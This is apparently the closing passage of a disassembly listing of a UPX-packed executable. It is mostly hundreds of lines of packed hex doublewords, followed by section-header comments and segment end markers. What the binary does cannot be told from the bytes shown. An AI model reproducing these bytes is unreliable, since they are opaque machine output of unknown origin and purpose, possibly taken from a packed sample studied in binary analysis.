dd 3E46B369h, 825FDEC8h, 0B726D5D8h, 0A76AD949h, 35C7CD8Eh
dd 43FE7B2Dh, 0C4DA6514h, 0D7608462h, 0A4E02DDCh, 0A383F9BEh
dd 0B1738FBh, 198AF928h, 5DE33DACh, 3E08B97Ch, 0E716991Eh
dd 0BE237216h, 6F9E141Eh, 0B33E5568h, 7AB97E44h, 3BEA4559h
dd 7FEE5DC4h, 3EFDF59Ch, 736F985h, 4BBA2598h, 0D76E66D1h
dd 9F192C1Ah, 0FCECF524h, 8A47E6EDh, 9F0E3D00h, 0CE52C128h
dd 0A44EAB85h, 90775358h, 111E4DF0h, 89A2A29Bh, 0AF0828AFh
dd 0D6F071B1h, 0BF6ED1E7h, 0F9713D10h, 87AA4E39h, 946147D8h
dd 0F32BCA1h, 1392F160h, 0D61E5BA4h, 1B092528h, 8244B5F0h
dd 2352ED8Bh, 0F9E1AEDAh, 0EB466E75h, 72D1263Ch, 33E2DD71h
dd 37E655C4h, 0BBAA094h, 0F387604Eh, 0EC482150h, 47EA7459h
dd 0CB1AA918h, 0A2007D5Ch, 0C6BE2DA2h, 3A8CB3B3h, 0DB8AA551h
dd 460478E5h, 0F8EC41F0h, 0FA1BA174h, 6B5A1937h, 0C5DE1A3Bh
dd 7F13CC6Fh, 0F72695C4h, 7344D948h, 3D034C32h, 0D8CC781Ch
dd 4A3C9DC4h, 0B3AF583h, 0A5BD0D5Ch, 0E2DE990h, 0D786A935h
dd 1B8A7968h, 0E11E3F01h, 0CFEBDC6Ah, 8C38C574h, 76971DF8h
dd 0EFDE9DC3h, 496296B7h, 0EB7758DBh, 3BAA1948h, 74C35DCDh
dd 3E28E160h, 736F97Dh, 65BD1242h, 853EEE84h, 132EC8BDh
dd 0C7ED9B64h, 0D655A3A9h, 9FCE71FDh, 0E350C130h, 0AA89F229h
dd 6B9A15A9h, 0AF228DFCh, 3312BB6Dh, 2BCD988Eh, 0D6705908h
dd 0BF6ED1DCh, 9D624111h, 0AC378B4Ch, 93216988h, 5234EDCCh
dd 1342FD7Bh, 864BEA4Eh, 9B0A39F4h, 0D24EB52Ch, 0A0DA9F60h
dd 8D7B4F5Ch, 51A49E4h, 445F1D97h, 29DA6178h, 37FA7F49h
dd 36F54308h, 0FF2E111Dh
dd 43A22190h, 6AAB3885h, 63B94176h, 0E3549056h, 0A8DC31E0h
dd 0BE6CB5F7h, 9B2343BDh, 4E13326Ch, 63D281BCh, 0FA1665F4h
dd 5045184Fh, 2646B387h, 897F4BC8h, 7726D5D8h, 5670DAE4h
dd 3FEE5166h, 0E60BFAEEh, 0C776BC9Eh, 660028E2h, 4FFE3416h
dd 3B720ABEh, 0B2F3826h, 4F0F928h, 1FA22C31h, 0A31282F0h
dd 68DAD235h, 0C39A0978h, 915571E3h, 0BF53047Bh, 26E7D584h
dd 39AA1988h, 7FEE9C63h, 0BE7FA210h, 881ACA0Ch, 4B32D2BEh
dd 31FE6DDCh, 0ED3CFCBBh, 79AB7EFCh, 34E6B153h, 0CC65836Bh
dd 4CA9DFF0h, 67CAD4F9h, 6BDA49B8h, 805E20FDh, 0B38EA0BDh
dd 37A61584h, 150445D0h, 708A1854h, 0C37E10CDh, 47B62594h
dd 0CA876EDAh, 24608C16h, 0B2F28DCh, 5BAAAD0Ah, 0A831E2C6h
dd 34A4B5BCh, 6BDA9F66h, 8C5B4711h, 51A49E4h, 7F5D6697h
dd 0AE8D6BB9h, 77A68995h, 3B2A9908h, 0FEFD60h, 2FCB9C6Ah
dd 0A7376594h, 0D3C3AC32h, 727CED80h, 53023DB9h, 17059924h
dd 8BB1B5E4h, 0C730574Dh, 0FEC8E177h, 0A75659DDh, 66C53256h
dd 2FDEE16Dh, 73E251A0h, 3AF9E698h, 0FB2A0519h, 1FAE1D8Ch
dd 0BC3D54DCh, 0C736A517h, 7BEAE444h, 0C46D0636h, 1177EA1Fh
dd 0FC46F53Dh, 0F4B80A9h, 0E2C4853Ch, 0A3D26D09h, 0F6DB5A9Eh
dd 2B9AC964h, 43DE8DBCh, 0E3CA2FF4h, 0DEEBDF07h, 0E0AA5954h
dd 0A87643C6h, 9ACF9B30h, 0A976A588h, 1A37F643h, 8CFE2D10h
dd 0DF43B120h, 460B2A37h, 5BCA79B4h, 13EE7DECh, 0E00D6E25h
dd 7B960574h, 116A99B5h, 68959E17h, 0FAE84CBBh, 0FFCD1544h
dd 683E2151h, 0AEB39245h, 372A11Ch, 5AB6A594h, 7277ECDEh
dd 453EED50h, 1A02B158h, 0E25E66A7h, 0B7C6BCE4h, 3F0FBD1Ch
dd 0B8097168h, 0FFB84B57h, 5074C9E9h, 6FD91562h, 33A25918h
dd 194757C4h, 36D1F173h, 0A170D005h, 5D7250D8h, 0ED35F57Fh
dd 972E249Dh, 92B1ED1Ch, 53023DD1h, 0A70675E4h, 75B775h
dd 26A5C5B4h, 78AA922Bh, 2CE66E2Ch, 0AB932BBDh, 0AD330C7Ch
dd 72E291A9h, 9B6A1EDDh, 9EFF6044h, 0B4AE5D7Ch, 43FBDF15h
dd 45BBCE14h, 147AA991h, 8FB23C21h, 930231E0h, 4844E924h
dd 17C862A0h, 0DC0193ACh, 0E3DBD775h, 6B61C534h, 2B9A08D1h
dd 6FDE4854h, 0E15F4A00h, 0E4329892h, 7FE63F5Ah, 12395D08h
dd 0C372CC88h, 0DEF068DDh, 0D00929D8h, 0B7FD79A4h, 481A0207h
dd 13AEE927h, 0E05DEE76h, 0DFD7E361h, 0A1510A30h, 0E51B8C80h
dd 68DA89B1h, 329785BEh, 0F32298FEh, 0F0CE860Fh, 7BEAD91Bh
dd 71E3750Ch, 66E946D7h, 47F63C3Ah, 9543D1A6h, 42B57A0Bh
dd 1342F8FEh, 54CE7F2Fh, 5DF17DB2h, 0D85354AFh, 2393A1E8h
dd 1D5A52B4h, 0A81A89F9h, 0AF8727B1h, 814F1280h, 0E3E6159Dh
dd 362D81DCh, 0FF6EDDAEh, 18AE5F05h, 47EF3759h, 0FB34AA18h
dd 18B073B4h, 0AD27B287h, 970635FDh, 9421C275h, 240DFA68h
dd 0B8D241B1h, 49AB5C00h, 0EC5A0931h, 2F9F0801h, 415F52C0h
dd 0D926D5DDh, 0D6BD11C9h, 3F7AA08Bh, 436961D0h, 9B75CE16h
dd 15435128h, 9AA7FA8Bh, 93C2787Eh, 0D7EA3833h, 9689F968h
dd 5F0E2446h, 0CAA0FCF3h, 0E7DDC574h, 2C9EC663h, 6FDE083Eh
dd 0AB5D5A00h, 0F7AA5653h, 0FB291988h, 93B15ECEh, 0AA801C13h
dd 0B744E514h, 222CB48Fh, 2296D9Ch, 0D382BC58h, 20C6781Eh
dd 5BCAA625h, 9F7A94ECh, 4416C130h, 272A8883h, 7D5A49B8h
dd 24A38A11h, 6862D140h, 74CD144Ah, 0D3522994h, 0A6F98A21h
dd 0C37B7F95h, 44E97894h, 4BF31355h, 0DDC3AE1Ch, 8A82B189h
dd 179FFF29h, 0D00A02E8h, 9F177FB1h, 488AB370h, 270F0B39h
dd 0BE831BF8h, 0BF5ECD3Ch, 147ADE32h, 2E655C4h, 7AB18DCEh
dd 0BD6DDF27h, 0F92F4A80h, 1AF6250Dh, 0BBF62A1Ch, 0D3F9FCCBh
dd 0E8E315BCh, 1A91B6DFh, 0DB8AB09Ah, 8DE3764Ch, 0BBD281B9h
dd 80119BAAh, 0EB5A3059h, 29138D7Ch, 41D68E9Bh, 0BF69CE0Dh
dd 2C7E5B4Fh, 38E70A9Bh, 0A434134Dh, 0AB322E13h, 0E76B86D9h
dd 0D8692D9Ch, 57193647h, 0B72AFFA5h, 5DAAF968h, 5B45FDBFh
dd 358FFE0Ch, 7256052Dh, 2BB6D4F1h, 3D634EBCh, 0D2251E9h
dd 0DC3078A9h, 47E81AC6h, 0C1EA1FA7h, 7C0A8ACEh, 77697D5h
dd 4BBA2498h, 9BC0E4DCh, 4601D767h, 575EC3F9h, 0E65D87A8h
dd 9FCE70B8h, 0D4D569B3h, 27965EF8h, 1957D0B8h, 51E4DE5h
dd 5EC5FF40h, 37E648D8h, 0F7ED9945h, 0BF2E9D70h, 0D322212Bh
dd 6D0626FEh, 8BFA51D9h, 58906D1Ch, 0D36F95EDh, 0D05EB6A4h
dd 96DCF5EFh, 62C7BD2Ch, 2352E81Eh, 7EACD041h, 169F89B8h
dd 0EF1E945Eh, 33F8C351h, 0FB5BD2F4h, 382AD9D5h, 83694AD4h
dd 43B21C84h, 0DA3165BEh, 0CB7AC066h, 0E2FE60CBh, 0DB4131E0h
dd 8A8A8243h, 624AB924h, 5F5797F1h, 608B32B0h, 0D6663437h
dd 3C2BC562h, 6FC7C3F1h, 536FD6C0h, 3A26D5D9h, 4AE6DE08h
dd 2CAE1D90h, 156FD889h, 0F636E54Dh, 0FC229829h, 7FBE2A9Ch
dd 5E62DC47h, 17CBB564h, 1710756Fh, 0E2473DACh, 0A3D268C2h
dd 0CEA31DF7h, 70210978h, 7E63E2A4h, 0B32251ECh, 0AA56D544h
dd 5E271A86h, 6CEE1DBCh, 6CF3A242h, 8E973AC5h, 8BB38315h
dd 73E5F5DCh, 8B9B120h, 820BF680h, 88CA7998h, 904F7E1Eh
dd 5AF36E01h, 67CF9BF9h, 0F4DD0AB8h, 8C0793B7h, 0DB31442Dh
dd 4BE5CA93h, 20B3A9CBh, 8F2DB54Dh, 0AC150BD1h, 5B6F93FDh
dd 8FB0EAEDh, 44DEFF1Dh, 0D1F9F51Bh, 67043698h, 8CD2356Dh
dd 1E2D8403h, 4A287C7Bh, 0EC1545F4h, 0B82A65C4h, 77DC4AFCh
dd 0F0A21180h, 7C4DA24Fh, 0B36C4C8Dh, 74BADD8Ch, 976B52B7h
dd 89A44410h, 0C965034Ch, 0DBD40D78h, 17567DE4h, 0D3432912h
dd 38F2E428h, 4A8F76A5h, 630F89EDh, 0D4538EA8h, 0EC5AFB7Bh
dd 0F889DE01h, 76E1CA67h, 0F470DCBBh, 2C84554Fh, 90BB0A9Bh
dd 74A42C13h, 60F19E98h, 0C845FCCFh, 0D3B93FCFh, 9425B6F0h
dd 0AB750541h, 1606FE2Fh, 8C59EA7Bh, 85E7991Bh, 6B6162F3h
dd 0FC8D1FB0h, 6136FFAFh, 8B229100h, 30C15273h, 3BAA19B0h
dd 9A6F28CCh, 0C372B68Ah, 77500BDh, 196D8598h, 56AC0057h
dd 4A5EB160h, 51079B86h, 0D6CD93EDh, 9F0E7E12h, 0E01607ABh
dd 3C17ABD2h, 0E6DD8408h, 0AF1E8E12h, 0F36C12EFh, 40A61564h
dd 7BE96045h, 0B6D930Ch, 0E3245A52h, 4572A9A3h, 8F1969D8h
dd 0CE3F749Dh, 8D75F160h, 57C63792h, 8C1CBC50h, 3CCCBAFBh
dd 98920172h, 2DD535FEh, 0AB1AE1FCh, 472FCD3Dh, 0F4852B96h
dd 6B11E894h, 9BBB99C8h, 0F37E901Ch, 23082150h, 1FCEAC52h
dd 71069124h, 3D033ACBh, 809D97h, 0C67B6446h, 404AF934h
dd 1F9095D1h, 3BFB41B0h, 0A71685FAh, 51067190h, 0B2141AABh
dd 73A21D99h, 9E4C198Ah, 836A9914h, 7FC23411h, 0AC52C3D0h
dd 72AB499h, 0B7AF158h, 0CFB7809Ch, 53EE8A85h, 1A5AB424h
dd 475B74B7h, 5FCD3DECh, 0A89E80F0h, 0FB7F20B4h, 77970938h
dd 858BCD2Ch, 0AE2251ECh, 72E67A58h, 3BEA4573h, 0B05851D1h
dd 33ED08Dh, 776E554h, 0CBC37518h, 4FF28489h, 4A6DB320h
dd 4EF058E7h, 0C3CA39E8h, 8819B16Bh, 44D78108h, 25BB2DB3h
dd 0DE6149B8h, 0AF5E54B2h, 34C677D8h, 3C2A22A3h, 0EA59CAh
dd 0FF370F61h, 0E7145A50h, 5EE397h, 8C2DBE4Dh, 0CF3F809Eh
dd 0EF387060h, 0B7C63504h, 0E5B8AF73h, 0DC42E72Fh, 9E9D113Ah
dd 679619A5h, 9B1A89F8h, 82DBCB71h, 33E2DD64h, 87D3E04Fh
dd 17F999C8h, 0F6698483h
dd 0AE272190h, 87B655D4h, 0CBAB440Bh, 73ADEFBFh, 1FB3AC8Fh
dd 970675A4h, 574DC928h, 1F8EFD04h, 0BBAA7277h, 801194A3h
dd 2F434C3h, 0DD230D3Ch, 7370CDB7h, 2AAD9504h, 0FB2A105Ah
dd 0BE9E5707h, 83D27D0Ah, 0D1D8514h, 0D878BA60h, 43EC2E55h
dd 8397E40Bh, 62CDB564h, 1B4A094Dh, 8B4593FEh, 0F66F020Ch
dd 0E7560544h, 2BFF66FBh, 0E4DE4DBCh, 0E92389AAh, 78B9D64Ch
dd 0B527A297h, 0B0EE1D95h, 33ED08Dh, 776A554h, 0D4B87598h
dd 8BAC6EE4h, 1EBBC139h, 1746EC12h, 5AB26A33h, 0CE93B2FCh
dd 0A352013Ch, 7B960574h, 1AF2D6BAh, 780AE114h, 0E7B9F8E7h
dd 1CCE8687h, 459B5DDAh, 659411Fh, 0EF768CC5h, 0AB6525D4h
dd 5AFD1FAFh, 7DC128AEh, 0D982F161h, 179A2219h, 20424E8h
dd 1380E5DEh, 4427962h, 0C031115Ch, 0F1A1432Fh, 0DF14CE38h
dd 3FD38CAFh, 77E65504h, 0FAAFA908h, 765DD052h, 83BBB705h
dd 327B66D4h, 483AE928h, 0F7EC803h, 909931A0h, 115BB20Ch
dd 624AF941h, 1F8ECFF3h, 830CB6B0h, 0BB47082Bh, 0EB5AC978h
dd 30128D7Ch, 0BAFDE912h, 3C5C9223h, 0BB837FCDh, 0B6ADFE8Ch
dd 3969790Bh, 0D9BB2E24h, 0E27AA991h, 4CED25D6h, 92FA2B59h
dd 0B4C5C566h, 9611F920h, 5F0E24F6h, 0A3EE65C8h, 0EF14C434h
dd 5BD90851h, 83F9C036h, 2E0D91C0h, 0F7260915h, 4BAA1988h
dd 0FAED63E0h, 0C372B1A5h, 8AA9E50Ah, 4BFA35C9h, 8FFC6DDCh
dd 8DE49D8Dh, 4B5778BBh, 5BCA39E8h, 0A1A37DF0h, 0F222CAAh
dd 0AA890534h, 6B9A15A9h, 0AF1E4DFCh, 0ECD8CA6Dh, 354CD786h
dd 0A035BB76h, 0AD311705h, 4D707B12h, 0F5A5FA76h, 27D8F2B4h
dd 4C86AF9Bh, 0D36B9F05h, 0DBD135A4h, 8C1DB270h, 65C30FBh
dd 0AE950130h, 67961878h, 0C27CD42Fh, 62C9CD7Ch, 33E2DC64h
dd 6E9CE051h, 46AF99C8h, 0FF2E046Eh, 43087341h, 5EC8F853h
dd 36EDA958h, 0F3E0004h, 1A0CBC87h, 2A2175A4h, 0DB8AA43Ch
dd 474870E9h, 0E5541F0h, 0A7565CC6h, 77E75E86h, 0AC9ECD71h
dd 330B7F1Dh, 5FE59504h, 0FB6AD948h, 0BEAF7739h, 43011865h
dd 0D0E6DD14h, 0F6FA6499h, 0F432DDCh, 943AF223h, 5A07C2F4h
dd 1B4A04E8h, 5FBE286Fh, 0A79F810Ah, 0B52445Ah, 760BAD7Ch
dd 0B3366DCFh, 0FE059627h, 2C403D49h, 9920E9Fh, 1E39CA5Bh
dd 0EB4786E6h, 5F84F92Ah, 4BBA29B5h, 9863C5BCh, 9A6F7607h
dd 476AB9EFh, 930CA42Dh, 0EF857DACh, 9D3DF28h, 4A05077Ah
dd 6BDA7106h, 73958D2Bh, 0A330D15Ah, 2A7EA8A3h, 0B7695908h
dd 0B381C04h, 0AE160617h, 4B78A697h, 9C319240h, 5869850Bh
dd 502336C7h, 57C6693Ch, 535BA2E8h, 0DF4EBD4Bh, 239211C8h
dd 67F607B4h, 0AB1A5970h, 0EF5D653Ch, 4F601180h, 5B9AE0C4h
dd 384C5C0Ch, 63ADDD4h, 43B2F930h, 3B7D65D4h, 508FB934h
dd 0FC9B6C66h, 0EBC271CCh, 902198FDh, 0DB467B89h, 2193026Fh
dd 873E43B1h, 0C0A2ADC8h, 0A464A993h, 249594h, 62h dup(0)
dd 1280h dup(?)
UPX2 ends
; Section 4. (virtual address 0001F000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0001A600
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 3143F000h
align 2000h
_idata2 ends
end start